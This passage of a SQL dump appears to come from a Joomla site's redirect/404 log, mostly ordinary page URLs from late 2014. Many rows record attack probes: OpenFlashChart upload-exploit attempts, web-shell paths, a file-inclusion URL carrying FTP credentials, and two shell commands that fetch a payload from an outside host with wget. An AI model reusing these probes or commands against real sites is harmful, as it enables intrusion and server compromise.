00:00:00',301),(6263,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/images/stories/explore.php?baca','','','',2,0,'2014-10-29 16:15:15','0000-00-00 00:00:00',301),(6264,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/images/stories/magic.php.png','','','',2,0,'2014-10-29 16:15:37','0000-00-00 00:00:00',301),(6265,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/images/stories/magic.php.png?baca','','','',2,0,'2014-10-29 16:15:38','0000-00-00 00:00:00',301),(6266,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/images/stories/petx.php?baca','','','',6,0,'2014-10-29 17:02:07','0000-00-00 00:00:00',301),(6267,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/images/stories/explore.php?baca','','','',6,0,'2014-10-29 17:02:11','0000-00-00 00:00:00',301),(6268,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/images/stories/magic.php.png','','','',6,0,'2014-10-29 17:02:34','0000-00-00 00:00:00',301),(6269,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/images/stories/magic.php.png?baca','','','',6,0,'2014-10-29 17:02:34','0000-00-00 00:00:00',301),(6270,'http://www.3s-technologies.com.tr/index.php/en/products/smd-f','','','',1,0,'2014-10-29 21:00:26','0000-00-00 00:00:00',301),(6271,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/images/stories/magic.php.png?baca','','','',2,0,'2014-10-30 04:02:53','0000-00-00 00:00:00',301),(6272,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/images/stories/magic.php.png?baca','','','',1,0,'2014-10-30 04:06:43','0000-00-00 00:00:00',301),(6273,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/explore.gif','','','',1,0,'2014-10-30 04:06:45','0000-00-00 00:00:00',301),(6274,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/images/stories/wawalo.gif','','','',2,0,'2014-10-30 06:11:32','0000-00-00 00:00:00',301),(6275,'http://www.3s-technologies.com.tr/index.php/en//xmlrpc.php','','','',2,0,'2014-10-30 15:16:02','0000-00-00 00:00:00',301),(6276,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:38','0000-00-00 00:00:00',301),(6277,'http://www.3s-technologies.com.tr/index.php/en/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:39','0000-00-00 00:00:00',301),(6278,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:40','0000-00-00 00:00:00',301),(6279,'http://www.3s-technologies.com.tr/index.php/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:42','0000-00-00 00:00:00',301),(6280,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:43','0000-00-00 00:00:00',301),(6281,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:45','0000-00-00 00:00:00',301),(6282,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:46','0000-00-00 00:00:00',301),(6283,'http://www.3s-technologies.com.tr/index.php/en/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:47','0000-00-00 00:00:00',301),(6284,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:48','0000-00-00 00:00:00',301),(6285,'http://www.3s-technologies.com.tr/index.php/en/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:48','0000-00-00 00:00:00',301),(6286,'http://www.3s-technologies.com.tr/index.php/en/admin_area/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:50','0000-00-00 00:00:00',301),(6287,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:50','0000-00-00 00:00:00',301),(6288,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-10-30 16:07:53','0000-00-00 00:00:00',301),(6289,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/images/stories/petx.php?baca','','','',1,0,'2014-10-30 17:41:08','0000-00-00 00:00:00',301),(6290,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/images/stories/explore.php?baca','','','',1,0,'2014-10-30 17:41:18','0000-00-00 00:00:00',301),(6291,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/images/stories/magic.php.png','','','',1,0,'2014-10-30 17:41:42','0000-00-00 00:00:00',301),(6292,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/images/stories/magic.php.png?baca','','','',1,0,'2014-10-30 17:41:43','0000-00-00 00:00:00',301),(6293,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',1,0,'2014-10-30 19:49:53','0000-00-00 00:00:00',301),(6294,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-10-30 19:49:55','0000-00-00 00:00:00',301),(6295,'http://www.3s-technologies.com.tr/index.php/en/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-10-30 19:49:55','0000-00-00 00:00:00',301),(6296,'http://www.3s-technologies.com.tr//index.php','','','',867,0,'2014-10-30 23:32:37','0000-00-00 00:00:00',301),(6297,'http://www.3s-technologies.com.tr/index.php/en//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=petx.php','','','',1,0,'2014-10-31 01:19:32','0000-00-00 00:00:00',301),(6298,'http://www.3s-technologies.com.tr/index.php/en//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',1,0,'2014-10-31 01:19:34','0000-00-00 00:00:00',301),(6299,'http://www.3s-technologies.com.tr/index.php/en//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=petx.php.phpgif','','','',1,0,'2014-10-31 01:19:34','0000-00-00 00:00:00',301),(6300,'http://www.3s-technologies.com.tr/index.php/en//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php.phpgif','','','',1,0,'2014-10-31 01:19:35','0000-00-00 00:00:00',301),(6301,'http://www.3s-technologies.com.tr/index.php?option=ftp://2014agosto:snh2323@ftp.uhserver.com/x.php????','','','',1,0,'2014-10-31 02:25:05','0000-00-00 00:00:00',301),(6302,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/petx.php','','','',1,0,'2014-10-31 05:04:41','0000-00-00 00:00:00',301),(6303,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://visionafricamagazine.com/scripts','','','',1,0,'2014-10-31 05:04:42','0000-00-00 00:00:00',301),(6304,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/adminx.gif','','','',1,0,'2014-10-31 05:04:50','0000-00-00 00:00:00',301),(6305,'http://www.3s-technologies.com.tr/index.php/tr/?id=39&Itemid=57&lang=tr&option=com_content&view=category','','','',14,0,'2014-10-31 09:19:19','0000-00-00 00:00:00',301),(6306,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/wawalo.gif','','','',1,0,'2014-11-01 10:58:02','0000-00-00 00:00:00',301),(6307,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',2,0,'2014-11-01 14:08:46','0000-00-00 00:00:00',301),(6308,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:36:44','0000-00-00 00:00:00',301),(6309,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:37:31','0000-00-00 00:00:00',301),(6310,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:37:38','0000-00-00 00:00:00',301),(6311,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:37:40','0000-00-00 00:00:00',301),(6312,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:37:48','0000-00-00 00:00:00',301),(6313,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:37:52','0000-00-00 00:00:00',301),(6314,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:37:54','0000-00-00 00:00:00',301),(6315,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:01','0000-00-00 00:00:00',301),(6316,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:10','0000-00-00 00:00:00',301),(6317,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:18','0000-00-00 00:00:00',301),(6318,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:20','0000-00-00 00:00:00',301),(6319,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:25','0000-00-00 00:00:00',301),(6320,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:28','0000-00-00 00:00:00',301),(6321,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:30','0000-00-00 00:00:00',301),(6322,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:32','0000-00-00 00:00:00',301),(6323,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:34','0000-00-00 00:00:00',301),(6324,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:35','0000-00-00 00:00:00',301),(6325,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:37','0000-00-00 00:00:00',301),(6326,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:39','0000-00-00 00:00:00',301),(6327,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:45','0000-00-00 00:00:00',301),(6328,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:38:52','0000-00-00 00:00:00',301),(6329,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2014-11-01 16:38:54','0000-00-00 00:00:00',301),(6330,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2014-11-01 16:39:04','0000-00-00 00:00:00',301),(6331,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/petx.php?baca','','','',1,0,'2014-11-02 06:18:46','0000-00-00 00:00:00',301),(6332,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/explore.php?baca','','','',1,0,'2014-11-02 06:18:49','0000-00-00 00:00:00',301),(6333,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/magic.php.png','','','',1,0,'2014-11-02 06:19:09','0000-00-00 00:00:00',301),(6334,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/magic.php.png?baca','','','',1,0,'2014-11-02 06:19:10','0000-00-00 00:00:00',301),(6335,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:18','0000-00-00 00:00:00',301),(6336,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:19','0000-00-00 00:00:00',301),(6337,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:20','0000-00-00 00:00:00',301),(6338,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:21','0000-00-00 00:00:00',301),(6339,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:21','0000-00-00 00:00:00',301),(6340,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:22','0000-00-00 00:00:00',301),(6341,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:23','0000-00-00 00:00:00',301),(6342,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:24','0000-00-00 00:00:00',301),(6343,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:25','0000-00-00 00:00:00',301),(6344,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:25','0000-00-00 00:00:00',301),(6345,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:26','0000-00-00 00:00:00',301),(6346,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:27','0000-00-00 00:00:00',301),(6347,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:28','0000-00-00 00:00:00',301),(6348,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:29','0000-00-00 00:00:00',301),(6349,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:30','0000-00-00 00:00:00',301),(6350,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:33','0000-00-00 00:00:00',301),(6351,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:36','0000-00-00 00:00:00',301),(6352,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:36','0000-00-00 00:00:00',301),(6353,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:37','0000-00-00 00:00:00',301),(6354,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:38','0000-00-00 00:00:00',301),(6355,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:40','0000-00-00 00:00:00',301),(6356,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:41','0000-00-00 00:00:00',301),(6357,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp','','','',1,0,'2014-11-02 21:46:42','0000-00-00 00:00:00',301),(6358,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=racionais.pHp.pHp','','','',1,0,'2014-11-02 21:46:42','0000-00-00 00:00:00',301),(6359,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en&sa=U&ei=Fk1XVN_SGceP7AbNzIHYBw&ved=0CEYQFjAM&usg=AFQjCNHSrtsnrf4At873P9TR959t70gYiA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanage','','','',1,0,'2014-11-03 09:42:17','0000-00-00 00:00:00',301),(6360,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en&sa=U&ei=Fk1XVN_SGceP7AbNzIHYBw&ved=0CEYQFjAM&usg=AFQjCNHSrtsnrf4At873P9TR959t70gYiA/images/stories/vito.php?rf','','','',1,0,'2014-11-03 09:42:22','0000-00-00 00:00:00',301),(6361,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/food.php','','','',1,0,'2014-11-04 07:08:23','0000-00-00 00:00:00',301),(6362,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/petx.gif','','','',1,0,'2014-11-04 07:08:32','0000-00-00 00:00:00',301),(6363,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',3,0,'2014-11-04 08:02:26','0000-00-00 00:00:00',301),(6364,'http://3s-technologies.com.tr/index.php/en/?Itemid=128&id=117&lang=en&option=com_content&view=article','','','',7,0,'2014-11-04 15:43:51','0000-00-00 00:00:00',301),(6365,'http://3s-technologies.com.tr/index.php/en/?Itemid=117&id=119&lang=en&option=com_content&view=article','','','',7,0,'2014-11-04 17:18:57','0000-00-00 00:00:00',301),(6366,'http://3s-technologies.com.tr/index.php/en/?Itemid=58&id=168&lang=tr&option=com_content&view=article','','','',4,0,'2014-11-04 18:18:52','0000-00-00 00:00:00',301),(6367,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez5/images/stories/food.php?rf','','','',1,0,'2014-11-04 18:43:37','0000-00-00 00:00:00',301),(6368,'http://3s-technologies.com.tr/index.php/en/?Itemid=115&id=121&lang=en&option=com_content&view=article','','','',4,0,'2014-11-04 18:54:34','0000-00-00 00:00:00',301),(6369,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//images/stories/explore.gif','','','',1,0,'2014-11-04 22:37:25','0000-00-00 00:00:00',301),(6370,'http://3s-technologies.com.tr/index.php/en/?Itemid=92&id=51&lang=tr&option=com_content&view=category','','','',6,0,'2014-11-04 23:40:10','0000-00-00 00:00:00',301),(6371,'http://3s-technologies.com.tr/index.php/en/?Itemid=141&id=139&lang=en&option=com_content&view=article','','','',6,0,'2014-11-05 00:31:04','0000-00-00 00:00:00',301),(6372,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&141104-205711','','','',1,0,'2014-11-05 04:57:10','0000-00-00 00:00:00',301),(6373,'http://www.3s-technologies.com.tr/index.php?141104-205712','','','',1,0,'2014-11-05 04:57:10','0000-00-00 00:00:00',301),(6374,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&141104-205715','','','',1,0,'2014-11-05 04:57:13','0000-00-00 00:00:00',301),(6375,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/images/stories/petx.php','','','',1,0,'2014-11-05 05:39:29','0000-00-00 00:00:00',301),(6376,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/','','','',1,0,'2014-11-05 05:39:29','0000-00-00 00:00:00',301),(6377,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/images/stories/adminx.gif','','','',1,0,'2014-11-05 05:39:38','0000-00-00 00:00:00',301),(6378,'http://3s-technologies.com.tr/index.php/en/?Itemid=123&catid=40:temizleme&id=112:smd-firin-temizleme-roc&lang=en&option=com_content&view=article','','','',6,0,'2014-11-05 06:42:22','0000-00-00 00:00:00',301),(6379,'http://3s-technologies.com.tr/index.php/en/?Itemid=157&id=156&lang=en&option=com_content&view=article','','','',3,0,'2014-11-05 13:55:42','0000-00-00 00:00:00',301),(6380,'http://3s-technologies.com.tr/index.php/en/?Itemid=148&id=146&lang=en&option=com_content&view=article','','','',3,0,'2014-11-05 15:30:30','0000-00-00 00:00:00',301),(6381,'http://3s-technologies.com.tr/index.php/en/?Itemid=96&catid=51:neo&id=84:neoplace&lang=en&option=com_content&view=article','','','',4,0,'2014-11-05 15:59:52','0000-00-00 00:00:00',301),(6382,'http://3s-technologies.com.tr/index.php/en/?Itemid=112&id=105&lang=en&option=com_content&view=article','','','',3,0,'2014-11-05 17:33:39','0000-00-00 00:00:00',301),(6383,'http://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','','http://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','',5,0,'2014-11-05 20:24:29','0000-00-00 00:00:00',301),(6384,'http://3s-technologies.com.tr/index.php/en/?Itemid=108&id=97&lang=en&option=com_content&view=article','','','',2,0,'2014-11-05 22:13:25','0000-00-00 00:00:00',301),(6385,'http://3s-technologies.com.tr/index.php/en/?Itemid=156&id=154&lang=en&option=com_content&view=article','','','',6,0,'2014-11-05 23:27:44','0000-00-00 00:00:00',301),(6386,'http://3s-technologies.com.tr/index.php/en/?Itemid=123&id=112&lang=en&option=com_content&view=article','','','',2,0,'2014-11-06 01:19:31','0000-00-00 00:00:00',301),(6387,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=7KpaVMe_G4W6ogSQ9oLQDA&amp;ved=0COUDEBYwWQ&amp;usg=AFQjCNE1ZVjtL-4ztgdGrQAjDQ8Q5lC5vA/images/stories/vito.php?rf','','','',1,0,'2014-11-06 02:36:06','0000-00-00 00:00:00',301),(6388,'http://www.3s-technologies.com.tr/index.php/en/images/stories/vito.php?rf','','','',1,0,'2014-11-06 02:36:20','0000-00-00 00:00:00',301),(6389,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=CataVP7hHIuhyQT-v4FY&amp;ved=0CMcDEBYwUw&amp;usg=AFQjCNG31tkiI54Y9R5KySLygllae15V8g/images/stories/vito.php?rf','','','',1,0,'2014-11-06 03:10:20','0000-00-00 00:00:00',301),(6390,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=FKtaVOiPMYuhgwSkyYPYBA&amp;ved=0CMMDEBYwUw&amp;usg=AFQjCNEfMyKb9UA26QbFXffM7OW9cVqOjA/images/stories/vito.php?rf','','','',1,0,'2014-11-06 03:29:14','0000-00-00 00:00:00',301),(6391,'http://3s-technologies.com.tr/index.php/en/?Itemid=126&id=115&lang=en&option=com_content&view=article','','','',2,0,'2014-11-06 05:49:06','0000-00-00 00:00:00',301),(6392,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/archived-articles/2011','','','',10,0,'2014-11-06 13:59:04','0000-00-00 00:00:00',301),(6393,'http://3s-technologies.com.tr/index.php/en/?Itemid=146&catid=57:screen-printer&id=147:sp18p-l-screen-printer&lang=en&option=com_content&view=article','','','',10,0,'2014-11-06 18:22:28','0000-00-00 00:00:00',301),(6394,'http://www.3s-technologies.com.tr/index.php/en/images/stories/magic.php?baca','','','',2,0,'2014-11-06 22:23:02','0000-00-00 00:00:00',301),(6395,'http://www.3s-technologies.com.tr/index.php/en/images/stories/magic.php.png','','','',7,0,'2014-11-06 22:23:25','0000-00-00 00:00:00',301),(6396,'http://www.3s-technologies.com.tr/index.php/en/images/stories/magic.php.png?baca','','','',6,0,'2014-11-06 22:23:25','0000-00-00 00:00:00',301),(6397,'http://3s-technologies.com.tr/index.php/en/?Itemid=98&id=86&lang=en&option=com_content&view=article','','','',3,0,'2014-11-06 23:43:40','0000-00-00 